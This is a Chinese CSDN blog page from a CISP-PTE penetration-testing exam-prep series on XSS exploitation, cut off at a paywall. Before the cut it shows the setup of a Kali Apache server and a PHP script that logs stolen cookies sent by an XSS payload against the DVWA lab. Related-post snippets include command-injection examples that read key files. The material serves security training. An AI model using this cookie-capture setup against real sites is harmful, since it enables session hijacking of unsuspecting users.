CISP-PTE XSS进阶实战+Bypass绕过技巧

已于 2022-06-20 23:04:50 修改
阅读量1.3k 收藏 1
点赞数
分类专栏: CISP-PTE实战模拟 文章标签: xss web安全 安全
于 2022-06-13 16:44:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beirry/article/details/125180969
版权
本文介绍了CISP-PTE考试中XSS攻击的进阶实战和绕过技巧,包括大小写、双写、换行、分段注释、编码等绕过方法,并详细阐述了手工测试和工具测试的步骤,提供了DVWA靶场的实战示例。
摘要由CSDN通过智能技术生成

目录


通过上篇文章,我们对xss的三种类型以及利用方法有一个大概的了解了,那么接下来我们会讲讲该如何利用xss获取个人信息。

XSS攻击EXP演示

还是以DVWA靶场,获取cookie为例子:
这里用了kali来做为我们接收cookie的服务器,需要先在kali上开启apache。
受害机能访问到kali即可。

systemctl start apache2  //开启apache
systemctl status apache2 //查看服务情况

在这里插入图片描述
跳转到/var/www/html/下,新建一个php文件,文件内容如下:

<?php
$cookie = $_GET['cookie'];
file_put_contents('cookie.php',$cookie);
?>

最低0.47元/天 解锁文章
beirry
关注
专栏目录
渗透测试CISP-PTEXSS_cisp-pte xss,网络安全组件化入门
2301_79985178的博客
04-11 937
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
渗透测试CISP-PTEXSS
未知2066的博客
02-27 1013
XSS (Cross-Site Scripting) 攻击是一种利用 Web 应用程序的漏洞,通过在用户输入的数据中注入恶意脚本来实施攻击的方法。
CISP-PTE XSS基础
beirry的博客
06-02 989
同源策略 百度:同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。 同源的意思是指域名,协议,端口相同。不同源的客户端脚本(JavaScript,actionscript)再没明确授权的情况下,不能读写对方的资源。 如果两个页面的协议,端口和域名都相同,则两个页面具有相同的源。 以百度为例:https://www.baidu.co
渗透测试CISP-PTEXSS_cisp-pte xss,大厂必备
最新发布
sfdsfgdgd的博客
04-09 1096
XSS (Cross-Site Scripting) 攻击是一种利用 Web 应用程序的漏洞,通过在用户输入的数据中注入恶意脚本来实施攻击的方法。
pte练习——34051(sql)、34061、34214(代码)、34223(文件包含)、34224(xss)、34234(代码)、34415(xss
haoaaao的博客
02-10 3007
一、34051(sql注入) 1、输入用户名和特殊字符密码,发现个别字符被屏蔽,说明用户密码中存在sql注入漏洞。 2、想办法闭合语句,发现关键词大多数被屏蔽,尝试用or闭合,or被屏蔽,使用多写或大写可以绕过: 二、34061(sql注入) 1、题中给出查询语句,想办法闭合语句: 2、使用sql语句查询: (1)order by测试列数为7: (2)union select联...
CISP-PTE web渗透通关攻略
DG_s1mple
12-09 1551
想考一个cisp-pte的证,最近在网上找了一下,找到一些资料,就先做了顺便把过程记录下来 这是老靶场打开页面告诉我们需要读取/tmp/360/key文件,我们把它记下来,然后点击进入答题 进入到如下界面 把sql输入的句子直接显示在页面上了,我们开始用HackerBar测试 发现输入1’)报错无法返回 输入1’)%23可以正常返回页面可以确定注入条件了,然后我们开始测试它的字段数量 发现空格被过滤了,我们使用注释来绕过/**/ 发现为4的时候页面可以正常返回,为5的时候不返回 确定字段数量为5
CISP-PTE靶场(win+centos).zip
03-13
CISP-PTE靶场是一个针对信息安全专业人员进行渗透测试与应急响应能力训练的平台,它涵盖了Windows和Linux两种操作系统环境。这个压缩包包含了两个不同系统的靶场环境:win2003和CentOS,以及一个关于如何搭建CISP-...
CISP-PTE SQL注入 进阶Bypass绕过技巧
beirry的博客
04-15 3815
相信大家看完入门篇后,基本掌握了SQL注入的语法,那么这章主要讲下Bypass绕过技巧 过滤引号 当注入点过滤引号时,我们可以用Hex encoding或者CHAR() Function绕过 假设有一个查询语句为select * from user where id='[我们输入的值]'; Hex encoding 原查询语句select * from user where id=‘0x312723’; 解析为select * from user where id=‘1’#'; CHAR() Functi
cisp-pte注册渗透测试工程师详细资料及视频教程
07-16
CISP-PTE,全称为Certified Information Security Professional - Penetration Testing Engineer,即注册信息安全专业人员-渗透测试工程师,是一项针对网络安全专业人士的高级认证。这个认证主要针对的是那些专注于...
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
PTE_XSS(Day2)
CHUNJIUJUN的博客
08-10 271
JS消息框分为以下三种: alert("文本") confirm("文本") <script>var r=confirm("你选择了什么");if(r==true){alert('你选择了确认');}else{alert('你选择了取消');}</script> prompt("文本","默认值") XSS存储型注入 这里发现单引号被过滤了,所以用 / 或者双引号代替单引号 重定向 ...
命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping
qq_51550750的博客
02-14 931
命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。 比如PHP中的system,exec,shell_exec等,当用户可以控制命令执行中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 简单举例来说就是,比如想要创建一个目录,可能不会用代码创建,但是知道系统命令是mkdir,借助系统命令mkdir来创建目录。 举例:cp /tmp/sourcefile /app/public
A7 XSS漏洞学习
weixin_43355264的博客
02-02 572
xss跨站脚本---应用描述 自动化工具能够检测并利用所有的三种XSS形式,并且存在方便攻击者利用漏洞的框架。 xss是owasp top 10中第二普遍的安全问题,存在于近三分之二的应用中。自动化工具能自动发现一些xss问题,特别是在一些成熟的技术中。xss对于放射和DOM的形象是中等的,而对于存储的XSS的影响更为严重,臂如在受攻击者的游览器上执行远程代码例如:窃取凭证和会话或传递恶意软件...
CISP-PTE选择题整理(一)
千寻的博客
10-24 7580
LDAP认证查询语句句为:(&(USER=Uname)(PASSWORD=Pwd)) ,Uname和pwd可控,关于绕过认证下面说法正确的是。在拿到⼀个windows服务器下的webshell之后,我想看看当前在线的用户,下面这些命令可以做到的是。一个⽹站存在命令执⾏漏洞,由于服务器不能上外网,这是我们可以利用什么样的⽅式将文件上传到服务器器。拿到一个windows下的webshell,我想看一下主机的名字,如下命令做不到的是。linux 环境下,查询⽇日志⽂文件最后100⾏行行数据,正确的⽅方式是。
cisp-pte考试靶场及通关攻略下载
潇湘信安的博客
02-17 3352
周末抽空找了几个CISP-PTE考试靶场和一份通关攻略文档,并将这份攻略整理成了PDF文档。
命令执行漏洞
weixin_44971601的博客
09-29 1219
RCE漏洞入门基础知识
08-(RCE)命令及代码执行漏洞
qq_56414082的博客
03-28 920
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)分为远程命令执行ping和远程代码执行eval。
模拟cisp-pte 第四题 命令执行
小明师傅博客
06-14 3027
输入127.0.0.1 | find / -name “key.php” 找到文件位置,php文件不可以直接读 tac /app/key.php 用tac读php文件 成功
CISP-PTE/CISP-PTS白皮书:渗透测试专业认证指南
CISP-PTE/CISP-PTS是针对高级网络安全渗透测试人才的培养和考核标准,旨在检验和验证个人在网络防御和攻击技术方面的理论知识与实战能力。考试结合了理论和实践,是中国首个此类别的注册考试,对提升网络安全防护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beirry

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值